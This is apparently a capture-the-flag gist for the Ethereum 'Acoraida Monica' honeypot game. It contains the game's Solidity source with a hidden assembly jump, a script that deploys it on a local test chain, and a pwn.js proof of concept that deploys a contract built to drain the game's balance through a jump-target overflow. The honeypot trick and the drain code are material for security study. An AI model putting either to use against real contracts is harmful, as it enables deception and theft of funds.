
@LiveOverflow
Last active February 10, 2024 13:13
Acoraida Monica
/*
* The contract deployed on this address is `a` (the helper contract defined below).
*/
pragma solidity =0.4.25;
/// Declaration-only view of the target contract: just the Start(string,string) entry point,
/// without a body, so that `a` below can call it through a typed reference.
contract b{
function Start(string _question, string _answer) public payable;
}
/// Helper whose only behaviour lives in its constructor: while it is being deployed it
/// calls Start(q, r) on the contract at address `t`.
contract a {
    /// @param t address treated as a `b`-compatible contract
    /// @param q forwarded as Start's `_question`
    /// @param r forwarded as Start's `_answer`
    constructor(address t, string q, string r) public {
        // The call happens inside the creation transaction, i.e. as an internal call
        // rather than as a top-level transaction addressed to `t`.
        b startTarget = b(t);
        startTarget.Start(q, r);
    }
}
pragma solidity =0.4.25;
/// Published source listing of the "AcoraidaMonicaGame" question/answer contract.
/// NOTE(review): the constructor below transfers control with a raw `jump`, so the behaviour
/// of the deployed contract cannot be established from this listing alone; compare it against
/// the deployed bytecode before relying on anything stated here.
contract AcoraidaMonicaGame{
uint256 public version = 4;
string public description = "Acoraida Monica admires smart guys, she'd like to pay 10000ETH to the one who could answer her question. Would it be you?";
// Sample pair exposed through public getters; NewRound() refuses a hash equal to keccak256(sampleAnswer).
string public constant sampleQuestion = "Who is Acoraida Monica?";
string public constant sampleAnswer = "$*!&#^[` a@.3;Ta&*T` R`<`~5Z`^5V You beat me! :D";
// Fixed address that the three logging calls in NewRound() and TheAnswerIs() are sent to.
Logger public constant logger=Logger(0x5e351bd4247f0526359fb22078ba725a192872f3);
// Account allowed to call NewRound(); set by Start() and replaced by a successful TheAnswerIs().
address questioner;
string public question;
// keccak256 of the accepted answer. `private` only removes the generated getter; contract
// storage remains readable by anyone off-chain.
bytes32 private answerHash;
// The assembly pushes the current program counter and 0xe1, adds them and jumps to the sum.
// The destination therefore depends on the compiled bytecode layout, not on anything visible
// in this source. The `bytes a` argument is never referenced by name, and the constructor
// declares no visibility.
constructor(bytes a) {
assembly{
pc
0xe1
add
jump
}
}
// Requires that the caller has no code (extcodesize == 0).
// Caveat: extcodesize is also zero for a contract that is still running its constructor, so
// this check does not guarantee that the caller is an externally owned account.
modifier onlyHuman{
uint size;
address addr = msg.sender;
assembly { size := extcodesize(addr) }
require(size==0);
_;
}
// First-come initialisation with no access control: while answerHash is zero, any caller
// sets the answer hash and the question and becomes `questioner`. Once answerHash is set,
// later calls change nothing and do not revert, so ether sent with them stays in the contract.
// The plaintext `_answer` is passed as call data.
function Start(string _question, string _answer) public payable{
if(answerHash==0){
answerHash = keccak256(_answer);
question = _question;
questioner = msg.sender;
}
}
// Lets `questioner` replace the question and answer hash when at least 0.5 ether is sent,
// then reports both to `logger`. A call that fails the `if` is accepted without effect and
// without reverting; a hash equal to keccak256(sampleAnswer) reverts.
function NewRound(string _question, bytes32 _answerHash) public payable{
if(msg.sender == questioner && msg.value >= 0.5 ether){
require(_answerHash != keccak256(sampleAnswer));
question = _question;
answerHash = _answerHash;
logger.AcoraidaMonicaWantsToKnowTheNewQuestion(_question);
logger.AcoraidaMonicaWantsToKnowTheNewAnswerHash(_answerHash);
}
}
// Guess entry point (onlyHuman). When the hash of `_answer` matches and at least 1 ether is
// sent, the caller becomes `questioner`, receives the contract's whole balance and is
// reported to `logger`. Any other call is accepted without reverting, so the ether sent with
// a wrong guess stays in the contract.
function TheAnswerIs(string _answer) onlyHuman public payable{
//require(msg.sender != questioner);
if(answerHash == keccak256(_answer) && msg.value >= 1 ether){
questioner = msg.sender;
msg.sender.transfer(address(this).balance);
logger.AcoraidaMonicaWantsToKeepALogOfTheWinner(msg.sender);
}
}
/*function setLogger(address _log) public {
require(msg.sender == questioner);
logger = Logger(_log);
}*/
// Fallback: accepts plain ether transfers and calls with unknown selectors.
function () payable {}
}
/// Stateless event emitter: every public function re-emits its single argument as an event.
/// None of the functions has access control, so anyone can trigger these events; consumers
/// should not treat them as authenticated.
contract Logger {
    event WeHaveAWinner(address);
    event NewQuestion(string);
    event NewAnswerHs(bytes32);

    /// Emits NewAnswerHs carrying `_answerHash`.
    function AcoraidaMonicaWantsToKnowTheNewAnswerHash(bytes32 _answerHash) public {
        emit NewAnswerHs(_answerHash);
    }

    /// Emits NewQuestion carrying `_question`.
    function AcoraidaMonicaWantsToKnowTheNewQuestion(string _question) public {
        emit NewQuestion(_question);
    }

    /// Emits WeHaveAWinner carrying `winner`.
    function AcoraidaMonicaWantsToKeepALogOfTheWinner(address winner) public {
        emit WeHaveAWinner(winner);
    }
}
const Web3 = require('web3')
const Tx = require('ethereumjs-tx')
/*
Local test-chain setup, followed by the expected output of deploy.js.
The geth flags below enable the personal, admin, miner and debug APIs over unauthenticated
HTTP RPC and accept any browser origin (--rpccorsdomain "*"); that is only appropriate for a
disposable node listening on loopback.
$ rm -rf data
$ geth --datadir ./data init genesis.json
$ geth --datadir ./data --rpcapi eth,personal,web3,admin,miner,debug --rpc --mine --etherbase "0x492705c00090cb7c1cbb5ec3ab0b09f310dec399" --rpccorsdomain "*" --networkid="31231" --nodiscover
$ geth attach http://127.0.0.1:8545
> miner.start()
$ node deploy.js
Expected output:
LoggerAgent contract: 0xFEB07903B4972f4A668932D86C54D9D5264797cF
Logger contract: 0x5ba0805d3aba403ab3eB4A61fE31Cd7BBdd1e576
AcoraidaMonicaGame contract: 0x3A3AAC709285A54f7E0548b1609B3a8c96d7Fb09
LoggerAgent upgrade() success: true
a contract: 0x4AC502228e8FE102984BcB38c15859EeC9509E0F
AcoraidaMonicaGame Start() success: true
*/
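// Local geth test network (loopback endpoint).
const web3 = new Web3(new Web3.providers.HttpProvider('http://127.0.0.1:8545'));
// Signing key used for every transaction in this script. addressFrom is pre-funded in the
// genesis.json shown on this page, so this is a local-chain test key, not a secret to reuse
// anywhere else. Buffer.from() replaces the deprecated `new Buffer()` constructor.
const privateKey = Buffer.from('748e86e90bc4b3f894d79ff84cec01067ab8e7337e66d8747b6ebc453191ac4e', 'hex');
const addressFrom = '0x47a1b97b7A1f1Ad90741Ea94230b2361667fa2DB';
// Addresses of the deployed LoggerAgent and AcoraidaMonicaGame contracts; filled in from the
// deployment receipts and reused as `to` by later transactions.
let loggerAgent;
let gameContract;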
// Deployment chain for the local test network. Each transaction is sent only after the
// receipt of the previous one arrives, and the nonces 0x00-0x05 are hard-coded, so the script
// assumes a fresh chain on which addressFrom has not sent anything yet. Only 'receipt'
// handlers are attached; no send has an 'error' handler.
// The compiled bytecode below embeds addresses from the sample output (for example the
// LoggerAgent address inside the game bytecode), so the contracts are only wired together
// correctly when the resulting contract addresses match that output.
// create "LoggerAgent" contract
var tx = new Tx({
nonce: '0x00',
gasPrice: '0x1',
gasLimit: '0x2DC6C0',
value: '0x00',
from: addressFrom,
// No `to` field: contract creation. The dispatch table in this bytecode compares against the
// selectors 0x0900f010, 0x13af4035, 0x5c60da1b and 0x8da5cb5b.
data: '0x608060405234801561001057600080fd5b50604080517f41636f7261696461204d6f6e6963612069732063757465203a500000000000008152905190819003601a019020610056903364010000000061005b810204565b61005f565b9055565b6102c48061006e6000396000f3006080604052600436106100615763ffffffff7c01000000000000000000000000000000000000000000000000000000006000350416630900f010811461007357806313af4035146100a15780635c60da1b146100cf5780638da5cb5b1461010d575b61007161006c610122565b610165565b005b34801561007f57600080fd5b5061007173ffffffffffffffffffffffffffffffffffffffff60043516610189565b3480156100ad57600080fd5b5061007173ffffffffffffffffffffffffffffffffffffffff600435166101f1565b3480156100db57600080fd5b506100e4610122565b6040805173ffffffffffffffffffffffffffffffffffffffff9092168252519081900360200190f35b34801561011957600080fd5b506100e4610256565b604080517f536f20697320686572206c6f67676572203a44000000000000000000000000008152905190819003601301902060009061016090610290565b905090565b3660008037600080366000845af43d6000803e808015610184573d6000f35b3d6000fd5b33610192610256565b73ffffffffffffffffffffffffffffffffffffffff16146101b257600080fd5b604080517f536f20697320686572206c6f67676572203a4400000000000000000000000000815290519081900360130190206101ee9082610294565b50565b336101fa610256565b73ffffffffffffffffffffffffffffffffffffffff161461021a57600080fd5b604080517f41636f7261696461204d6f6e6963612069732063757465203a500000000000008152905190819003601a0190206101ee9082610294565b604080517f41636f7261696461204d6f6e6963612069732063757465203a500000000000008152905190819003601a019020600090610160905b5490565b90555600a165627a7a72305820037b138c3c4ca69837603d87247d193891ab9393bbf5f87ec357fca896cc7e5e0029'
});
tx.sign(privateKey);
web3.eth.sendSignedTransaction('0x'+tx.serialize().toString('hex')).on('receipt', t => {
console.log("LoggerAgent contract: "+ t.contractAddress);
loggerAgent = t.contractAddress;
// create "Logger" contract
var tx = new Tx({
nonce: '0x01',
gasPrice: '0x1',
gasLimit: '0x2DC6C0',
value: '0x00',
from: addressFrom,
// This bytecode's dispatch table compares against 0x0900f010, 0x679e1149 and 0xf1952473;
// 0x0900f010 also appears in the LoggerAgent dispatch table above.
data: '0x608060405234801561001057600080fd5b50610246806100206000396000f3006080604052600436106100565763ffffffff7c01000000000000000000000000000000000000000000000000000000006000350416630900f010811461005b578063679e11491461008b578063f1952473146100a3575b600080fd5b34801561006757600080fd5b5061008973ffffffffffffffffffffffffffffffffffffffff600435166100fc565b005b34801561009757600080fd5b50610089600435610148565b3480156100af57600080fd5b506040805160206004803580820135601f810184900484028501840190955284845261008994369492936024939284019190819084018382808284375094975061017e9650505050505050565b6040805173ffffffffffffffffffffffffffffffffffffffff8316815290517f10233db257888c60414333eee11dab8e8dabaf552466002fee253e03615db1d19181900360200190a150565b6040805182815290517ff364df9ddb52f724ebe11e75eeec2201580773fcb1e859511504ae872d4bf4569181900360200190a150565b7f0230497b4479b19065f0fe9c0bdee0259402f893cfa9e9b6a44fbf6ecca6299c816040518080602001828103825283818151815260200191508051906020019080838360005b838110156101dd5781810151838201526020016101c5565b50505050905090810190601f16801561020a5780820380516001836020036101000a031916815260200191505b509250505060405180910390a1505600a165627a7a72305820a0f75e6ea7890191aded7de6d24ce8c95b6effc66e67e5b577d26eedb1738e7f0029'
});
tx.sign(privateKey);
web3.eth.sendSignedTransaction('0x' + tx.serialize().toString('hex')).on('receipt', t => {
console.log("Logger contract: "+ t.contractAddress);
// create "AcoraidaMonicaGame" contract
var tx = new Tx({
nonce: '0x02',
gasPrice: '0x1',
gasLimit: '0x2DC6C0',
value: '0x00',
from: addressFrom,
// NOTE(review): in this listing the bytecode string below is wrapped over several lines;
// it has to be a single line for the script to parse.
data: '0x6004600055610120604052607960808190527f41636f7261696461204d6f6e6963612061646d6972657320736d61727420677560a09081527f79732c207368652764206c696b6520746f20706179203130303030455448207460c0527f6f20746865206f6e652077686f20636f756c6420616e7377657220686572207160e0527f75657374696f6e2e20576f756c6420697420626520796f753f00000000000000610100526100b191600191906100db565b503480156100be57600080fd5b50604051610177380380610177833981016040528051015860e101565b828054600181600116156101000203166002900490600052602060002090601f016020900481019282601f1061011c57805160ff1916838001178555610149565b82800160010185558215610149579182015b8281111561014957825182559160200191906001019061012e565b50610155929150610159565b5090565b61017391905b80821115610155576000815560010161015f565b905600000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000009d55b633ccfd60b61262a556109c4610171f36080604052600436106100985763ffffffff7c0100000000000000000000000000000000000000000000000000000000600035041663281ba0a8811461009a5780633fad9ae01461012457806346a3ec671461013957806354fd4d50146101855780637284e416146101ac578063aa332032146101c1578063c76de3e91461020f578063f24ccbfe14610299578063f7ff68a3146102d7575b005b3480156100a657600080fd5b506100af6102ec565b6040805160208082528351818301528351919283929083019185019080838360005b838110156100e95781810151838201526020016100d1565b50505050905090810190601f1680156101165780820380516001836020036101000a031916815260200191505b509250505060405180910390f35b34801561013057600080fd5b506100af61034c565b6040805160206004803580820135601f81018490048402850184019095528484526100989436949293602493928401919081908401838280828437509497506103da9650505050505050565b34801561019157600080fd5b5061019a61053b565b60408051918252519081900360200190f35b3480156101b857600080fd5b506100af610541565b6040805160206004803580820135601f8101849004840285018401909552848452610098943694929360249392840191908190840183828082843750949750509335945061059b9350505050565b60408051602060048035808
20135601f810184900484028501840190955284845261009894369492936024939284019190819084018382808284375050604080516020601f89358b018035918201839004830284018301909452808352979a9998810197919650918201945092508291508401838280828437509497506108139650505050505050565b3480156102a557600080fd5b506102ae6108ae565b6040805173ffffffffffffffffffffffffffffffffffffffff9092168252519081900360200190f35b3480156102e357600080fd5b506100af6108c6565b606060405190810160405280603081526020017f242a2126235e5b602061402e333b5461262a54602052603c607e355a605e355681526020017f20596f752062656174206d6521203a440000000000000000000000000000000081525081565b6003805460408051602060026001851615610100026000190190941693909304601f810184900484028201840190925281815292918301828280156103d25780601f106103a7576101008083540402835291602001916103d2565b820191906000526020600020905b8154815290600101906020018083116103b557829003601f168201915b505050505081565b33803b9081156103e957600080fd5b826040518082805190602001908083835b602083106104195780518252601f1990920191602091820191016103fa565b5181516020939093036101000a60001901801990911692169190911790526040519201829003909120600454149250508115905061045f5750670de0b6b3a76400003410155b15610536576002805473ffffffffffffffffffffffffffffffffffffffff1916339081179091556104b13660a01415815761402e61049d3361ffff16565b5101561580156104b1563d6000803e3d6000fd5b50604080517f0900f010000000000000000000000000000000000000000000000000000000008152336004820152905173FEB07903B4972f4A668932D86C54D9D5264797cF91630900f01091602480830192600092919082900301818387803b15801561051d57600080fd5b505af1158015610531573d6000803e3d6000fd5b505050505b505050565b60005481565b60018054604080516020600284861615610100026000190190941693909304601f810184900484028201840190925281815292918301828280156103d25780601f106103a7576101008083540402835291602001916103d2565b60025473ffffffffffffffffffffffffffffffffffffffff16331480156105ca57506706f05b59d3b200003410155b1561080f5760408051606081018252603080825256242a2126235e5b602061402e333b5461262a54602052603c607e355a605e35566020830
19081527f20596f752062656174206d6521203a4400000000000000000000000000000000838501529251919282918083835b602083106106545780518252601f199092019160209182019101610635565b5181516020939093036101000a60001901801990911692169190911790526040519201829003909120841415925061068e91505057600080fd5b81516106a19060039060208501906108fd565b5060048181556040517ff1952473000000000000000000000000000000000000000000000000000000008152602091810182815284516024830152845173FEB07903B4972f4A668932D86C54D9D5264797cF9363f195247393879392839260449092019185019080838360005b8381101561072657818101518382015260200161070e565b50505050905090810190601f1680156107535780820380516001836020036101000a031916815260200191505b5092505050600060405180830381600087803b15801561077257600080fd5b505af1158015610786573d6000803e3d6000fd5b5050604080517f679e114900000000000000000000000000000000000000000000000000000000815260048101859052905173FEB07903B4972f4A668932D86C54D9D5264797cF935063679e11499250602480830192600092919082900301818387803b1580156107f657600080fd5b505af115801561080a573d6000803e3d6000fd5b505050505b5050565b600454151561080f57806040518082805190602001908083835b6020831061084c5780518252601f19909201916020918201910161082d565b51815160209384036101000a600019018019909216911617905260405191909301819003902060045550845161088a935060039250908501906108fd565b506002805473ffffffffffffffffffffffffffffffffffffffff1916331790555050565b73FEB07903B4972f4A668932D86C54D9D5264797cF81565b60408051808201909152601781527f57686f2069732041636f7261696461204d6f6e6963613f000000000000000000602082015281565b828054600181600116156101000203166002900490600052602060002090601f016020900481019282601f1061093e57805160ff191683800117855561096b565b8280016001018555821561096b579182015b8281111561096b578251825591602001919060010190610950565b5061097792915061097b565b5090565b61099591905b808211156109775760008155600101610981565b905600a165627a7a723058205bf450560abe05048d3aecd129bb6420ca5acbef2f19c0ef9dca3f158d49e23f00290000000000000000000000'
});
tx.sign(privateKey);
web3.eth.sendSignedTransaction('0x' + tx.serialize().toString('hex')).on('receipt', t => {
console.log("AcoraidaMonicaGame contract: "+ t.contractAddress);
gameContract = t.contractAddress;
// call upgrade() on LoggerAgent
// NOTE(review): the data below does not begin with any of the four selectors in the
// LoggerAgent dispatch table; it begins with 0x60806040 and is the same creation bytecode as
// the "a" contract further down, with the LoggerAgent sample address as first constructor
// argument. Sent to LoggerAgent it would presumably reach the fallback rather than upgrade(),
// and the receipt status would still be logged. Confirm against the original setup.
var tx = new Tx({
nonce: '0x03',
gasPrice: '0x1',
gasLimit: '0x2DC6C0',
value: '0x00',
to: loggerAgent,
from: addressFrom,
data: '0x608060405234801561001057600080fd5b506040516101be3803806101be8339810160408181528251602080850151838601517fc76de3e90000000000000000000000000000000000000000000000000000000086526004860194855290860180516044870152805193969095910193600160a060020a0387169363c76de3e993879387939283926024830192606401919087019080838360005b838110156100b257818101518382015260200161009a565b50505050905090810190601f1680156100df5780820380516001836020036101000a031916815260200191505b50838103825284518152845160209182019186019080838360005b838110156101125781810151838201526020016100fa565b50505050905090810190601f16801561013f5780820380516001836020036101000a031916815260200191505b50945050505050600060405180830381600087803b15801561016057600080fd5b505af1158015610174573d6000803e3d6000fd5b505050505050506035806101896000396000f3006080604052600080fd00a165627a7a723058203e4de9ab30a2fe5e13562c8ce9a8dbc53b04e0ebee143230356f0bebf608c9380029000000000000000000000000feb07903b4972f4a668932d86c54d9d5264797cf000000000000000000000000000000000000000000000000000000000000006000000000000000000000000000000000000000000000000000000000000000e00000000000000000000000000000000000000000000000000000000000000048496e204d6164616761736361722c20796f752063616e6e6f742074616b6520612070696374757265206f662061206c656d75722077697468206772617920686169722e205768793f00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000017200000000000000000000000000000000000000000000000000000000000000'
});
tx.sign(privateKey);
web3.eth.sendSignedTransaction('0x' + tx.serialize().toString('hex')).on('receipt', t => {
console.log("LoggerAgent upgrade() success: "+t.status);
/*
contract b{
function Start(string _question, string _answer) public payable;
}
contract a{
constructor(address t, string q, string r) public{
b(t).Start(q,r);
}
}
*/
// create "a" contract
// The constructor arguments appended to the bytecode decode to: the game address from the
// sample output, the question "In Madagascar, you cannot take a picture of a lemur with gray
// hair. Why?" and the one-byte answer "r" (0x72). The `a` constructor forwards these to
// Start(), so the answer hash is set here, by an internal call during contract creation,
// before the visible Start() transaction below is sent.
var tx = new Tx({
nonce: '0x04',
gasPrice: '0x1',
gasLimit: '0x2DC6C0',
value: '0x0',
from: addressFrom,
data: '0x608060405234801561001057600080fd5b506040516101be3803806101be8339810160408181528251602080850151838601517fc76de3e90000000000000000000000000000000000000000000000000000000086526004860194855290860180516044870152805193969095910193600160a060020a0387169363c76de3e993879387939283926024830192606401919087019080838360005b838110156100b257818101518382015260200161009a565b50505050905090810190601f1680156100df5780820380516001836020036101000a031916815260200191505b50838103825284518152845160209182019186019080838360005b838110156101125781810151838201526020016100fa565b50505050905090810190601f16801561013f5780820380516001836020036101000a031916815260200191505b50945050505050600060405180830381600087803b15801561016057600080fd5b505af1158015610174573d6000803e3d6000fd5b505050505050506035806101896000396000f3006080604052600080fd00a165627a7a723058203e4de9ab30a2fe5e13562c8ce9a8dbc53b04e0ebee143230356f0bebf608c93800290000000000000000000000003A3AAC709285A54f7E0548b1609B3a8c96d7Fb09000000000000000000000000000000000000000000000000000000000000006000000000000000000000000000000000000000000000000000000000000000e00000000000000000000000000000000000000000000000000000000000000048496e204d6164616761736361722c20796f752063616e6e6f742074616b6520612070696374757265206f662061206c656d75722077697468206772617920686169722e205768793f00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000017200000000000000000000000000000000000000000000000000000000000000'
});
tx.sign(privateKey);
web3.eth.sendSignedTransaction('0x' + tx.serialize().toString('hex')).on('receipt', t => {
console.log("a contract: "+ t.contractAddress);
// call Start() on AcoraidaMonicaGame and send Ether
// The call data is selector 0xc76de3e9 with the same question and the answer "You need a
// camera instead of gray hair."; the value is 10^24 wei (1,000,000 ether on the local chain).
// Per the published Start() source, a call made after the answer hash is already set changes
// nothing, so the answer visible in this transaction is not the one the contract checks.
var tx = new Tx({
nonce: '0x05',
gasPrice: '0x1',
gasLimit: '0x2DC6C0',
value: '0xd3c21bcecceda1000000',
from: addressFrom,
to: gameContract,
data: '0xc76de3e9000000000000000000000000000000000000000000000000000000000000004000000000000000000000000000000000000000000000000000000000000000c00000000000000000000000000000000000000000000000000000000000000048496e204d6164616761736361722c20796f752063616e6e6f742074616b6520612070696374757265206f662061206c656d75722077697468206772617920686169722e205768793f0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000027596f75206e65656420612063616d65726120696e7374656164206f66206772617920686169722e00000000000000000000000000000000000000000000000000'
});
tx.sign(privateKey);
web3.eth.sendSignedTransaction('0x' + tx.serialize().toString('hex')).on('receipt', t => {
console.log("AcoraidaMonicaGame Start() success: "+t.status);
});
});
});
});
});
});
{
"config": {
"chainId": 31231,
"homesteadBlock": 0,
"eip155Block": 0,
"eip158Block": 0,
"byzantiumBlock": 0
},
"coinbase": "0x492705c00090cb7c1cbb5ec3ab0b09f310dec399",
"difficulty": "0",
"gasLimit": "10000000000000",
"alloc": {
"0xcf2f3781229416d78c9861c9a5f0617ba5ca96af": {
"balance": "100000000000000000000000000000"
},
"0x47a1b97b7A1f1Ad90741Ea94230b2361667fa2DB": {
"balance": "100000000000000000000000000000"
},
"0x19baa751d1092c906ac84ea4681fa91e269e6cb9": {
"balance": "200000000000000000000"
},
"0x492705c00090cb7c1cbb5ec3ab0b09f310dec399": {
"balance": "100000000000000000000000000000"
},
"0xf29e621ee00eb8aca28f7fab785c054e465805e6": {
"balance": "200000000000000000000"
}
}
}
// Proof-of-concept contract from the CTF write-up on this page. Both constants refer to the
// local test chain: `player` is an account pre-funded in the page's genesis.json and `game`
// is the AcoraidaMonicaGame address printed in deploy.js's sample output.
contract LiveOverflow{
address constant public player = 0x0019baa751d1092c906ac84ea4681fa91e269e6cb9;
address constant public game = 0x003a3aac709285a54f7e0548b1609b3a8c96d7fb09;
// Sends `game.balance` wei to `player` out of the balance of whichever contract is executing
// this code, then returns a fixed constant. The copy of this contract in the page's pwn.js
// annotates the constant as "jump target integer overflow".
function withdraw() public payable returns (uint256) {
player.transfer(game.balance);
return 0xfffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffbe7;
}
}
// logger.js
var Web3 = require('web3');
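// Client for the local geth node. Declared with `const` so the script no longer creates an
// implicit global (which would also throw under strict mode).
const web3 = new Web3('http://127.0.0.1:8545');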
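/**
 * Walks the chain upward from block `number`, printing every transaction and every
 * transaction receipt it finds.
 *
 * When the requested block does not exist yet (or the node returns an error), the same
 * height is polled again after a short delay, so the scan follows the chain head instead of
 * counting past it in a tight loop.
 *
 * @param {number} number - height of the block to fetch
 */
function getBlock(number) {
  const retryDelayMs = 1000;

  web3.eth.getBlock(number, (err, block) => {
    if (err) {
      console.error(err);
      setTimeout(() => getBlock(number), retryDelayMs);
      return;
    }
    if (block == null) {
      // Not mined yet: wait and ask for the same height again.
      setTimeout(() => getBlock(number), retryDelayMs);
      return;
    }

    block.transactions.forEach((txHash) => {
      // A promise's then() callback receives the result as its only argument; there is no
      // error-first pair here, so failures are handled with catch().
      web3.eth.getTransaction(txHash)
        .then((transaction) => {
          console.log("====== BLOCK # " + number + " | TX # " + txHash + " ========");
          console.log(transaction);
        })
        .catch(console.error);

      web3.eth.getTransactionReceipt(txHash)
        .then((receipt) => {
          console.log("====== BLOCK # " + number + " | Receipt # " + txHash + " ========");
          console.log(receipt);
        })
        .catch(console.error);
    });

    getBlock(number + 1);
  });
}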
// Start the scan at the genesis block (height 0).
getBlock(0);
/*
* The contract deployed on this address is Logger
*/
pragma solidity =0.4.25;
/// Stateless event emitter: every public function re-emits its single argument as an event.
/// None of the functions has access control, so anyone can trigger these events; consumers
/// should not treat them as authenticated.
contract Logger {
    event WeHaveAWinner(address);
    event NewQuestion(string);
    event NewAnswerHs(bytes32);

    /// Emits NewAnswerHs carrying `_answerHash`.
    function AcoraidaMonicaWantsToKnowTheNewAnswerHash(bytes32 _answerHash) public {
        emit NewAnswerHs(_answerHash);
    }

    /// Emits NewQuestion carrying `_question`.
    function AcoraidaMonicaWantsToKnowTheNewQuestion(string _question) public {
        emit NewQuestion(_question);
    }

    /// Emits WeHaveAWinner carrying `winner`.
    function AcoraidaMonicaWantsToKeepALogOfTheWinner(address winner) public {
        emit WeHaveAWinner(winner);
    }
}
/*
* The contract deployed on this address is LoggerAgent
*/
pragma solidity =0.4.25;
/// Forwarding proxy with a replaceable implementation. The owner and implementation addresses
/// are kept in storage slots derived from keccak256 of fixed strings. A call that matches one
/// of this contract's own public functions is handled here; every other call goes to the
/// fallback, which delegatecalls the implementation.
/// NOTE(review): the compiled LoggerAgent and Logger bytecode in this page's deploy.js both
/// dispatch on selector 0x0900f010. If that holds for the deployed pair, a call meant for the
/// Logger function with that selector is handled by the proxy itself and never forwarded
/// (a proxy/implementation selector clash). Verify before relying on the forwarding.
contract LoggerAgent{
// Storage slot keys, not stored values.
bytes32 private constant ownerSlot = keccak256("Acoraida Monica is cute :P");
bytes32 private constant implSlot = keccak256("So is her logger :D");
// The deployer becomes the owner; the implementation slot is left unset.
constructor() public{
setAddress(ownerSlot, msg.sender);
}
// Restricts a function to the address currently stored in ownerSlot.
modifier onlyOwner{
require(owner()==msg.sender);
_;
}
// Reads the address stored at raw storage slot `_slot`.
function getAddress(bytes32 _slot) internal view returns (address value) {
bytes32 s = _slot;
assembly {value := sload(s)}
}
// Writes `_address` to raw storage slot `_slot`.
function setAddress(bytes32 _slot, address _address) internal {
bytes32 s = _slot;
assembly {sstore(s, _address)}
}
function owner() public view returns (address){
return getAddress(ownerSlot);
}
function implementation() public view returns (address){
return getAddress(implSlot);
}
// Owner-only: hands ownership to `_owner`. No zero-address check is made.
function setOwner(address _owner) onlyOwner public{
setAddress(ownerSlot, _owner);
}
// Owner-only: replaces the implementation address. No check is made that `_impl` has code.
function upgrade(address _impl) onlyOwner public {
setAddress(implSlot, _impl);
}
// Copies the full call data to memory offset 0, delegatecalls `_impl` with all remaining gas,
// copies the return data back and then reverts (result 0) or returns with it. Because this is
// a delegatecall, the implementation's code runs against this contract's storage and balance.
function _delegateforward(address _impl) internal {
assembly {
calldatacopy(0, 0, calldatasize)
let result := delegatecall(gas, _impl, 0, calldatasize, 0, 0)
returndatacopy(0, 0, returndatasize)
switch result
case 0 {revert(0, returndatasize)}
default {return(0, returndatasize)}
}
}
// Fallback: forwards every unmatched call, including ones that carry ether, to the current
// implementation. NOTE(review): while implSlot is unset the target is address 0, which has no
// code, so the delegatecall presumably succeeds with empty return data — confirm.
function () payable public{
_delegateforward(implementation());
}
}
/// Stateless event emitter: every public function re-emits its single argument as an event.
/// None of the functions has access control, so anyone can trigger these events; consumers
/// should not treat them as authenticated.
contract Logger {
    event WeHaveAWinner(address);
    event NewQuestion(string);
    event NewAnswerHs(bytes32);

    /// Emits NewAnswerHs carrying `_answerHash`.
    function AcoraidaMonicaWantsToKnowTheNewAnswerHash(bytes32 _answerHash) public {
        emit NewAnswerHs(_answerHash);
    }

    /// Emits NewQuestion carrying `_question`.
    function AcoraidaMonicaWantsToKnowTheNewQuestion(string _question) public {
        emit NewQuestion(_question);
    }

    /// Emits WeHaveAWinner carrying `winner`.
    function AcoraidaMonicaWantsToKeepALogOfTheWinner(address winner) public {
        emit WeHaveAWinner(winner);
    }
}
// pwn.js
var Web3 = require('web3');
const Tx = require('ethereumjs-tx')
//web3 = new Web3('http://100.100.0.4:8090/twO7sl%2BRT0%2BTyBUCbrQ%2BjQ%3D%3D')
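// Client for the local geth test node.
const web3 = new Web3(new Web3.providers.HttpProvider('http://127.0.0.1:8545'));
// Both keys below belong to the local test chain only: the addresses the page lists for them
// are pre-funded in the genesis.json shown on this page.
// Buffer.from() replaces the deprecated `new Buffer()` constructor.
// 0x19baa751d1092c906ac84ea4681fa91e269e6cb9
const privateKeyPlayer = Buffer.from('91ca018bbf10b7c61d4d3b863298b1b26e2332f242e090dd35c4b314c5eeebf6', 'hex');
// 0xf29e621ee00eb8aca28f7fab785c054e465805e6
const privateKeyAttack = Buffer.from('3e38f85bac0f090b02bccb10ca168969254823d751b73937e8f8aa5c207a2e8a', 'hex');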
/*
contract LiveOverflow{
address constant public player = 0x0019baa751d1092c906ac84ea4681fa91e269e6cb9;
address constant public game = 0x003a3aac709285a54f7e0548b1609b3a8c96d7fb09;
function withdraw() public payable returns (uint256) {
player.transfer(game.balance);
// jump target integer overflow
return 0xfffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffbe7;
}
}
*/
// CTF proof-of-concept for the local test chain defined on this page (endpoint
// 127.0.0.1:8545). The hard-coded addresses are the ones from deploy.js's sample output and
// from genesis.json, so the script is tied to that exact local deployment.
// create LiveOverflow attack contract with player privatekey
var tx = new Tx({
// Hard-coded nonce: assumes the player account has not sent any transaction yet.
nonce: '0x00',
gasPrice: '0x1',
gasLimit: '0x2DC6C0',
value: '0x0',
from: '0x19baa751d1092c906ac84ea4681fa91e269e6cb9', // Player
data: '0x608060405234801561001057600080fd5b50610232806100206000396000f300608060405260043610610057576000357c0100000000000000000000000000000000000000000000000000000000900463ffffffff1680633ccfd60b1461005c57806348db5f891461007a578063c3fe3e28146100d1575b600080fd5b610064610128565b6040518082815260200191505060405180910390f35b34801561008657600080fd5b5061008f6101d6565b604051808273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200191505060405180910390f35b3480156100dd57600080fd5b506100e66101ee565b604051808273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200191505060405180910390f35b60007319baa751d1092c906ac84ea4681fa91e269e6cb973ffffffffffffffffffffffffffffffffffffffff166108fc733a3aac709285a54f7e0548b1609b3a8c96d7fb0973ffffffffffffffffffffffffffffffffffffffff16319081150290604051600060405180830381858888f193505050501580156101af573d6000803e3d6000fd5b507ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffbe7905090565b7319baa751d1092c906ac84ea4681fa91e269e6cb981565b733a3aac709285a54f7e0548b1609b3a8c96d7fb09815600a165627a7a723058207e04ac9f2efaab04eecec5a56e18c5b285cd574fa308ac0b3a5567897979fcc30029'
})
tx.sign(privateKeyPlayer);
web3.eth.sendSignedTransaction('0x' + tx.serialize().toString('hex')).on('receipt', t => {
console.log('LiveOverflow Attack Contract created: '+t.contractAddress);
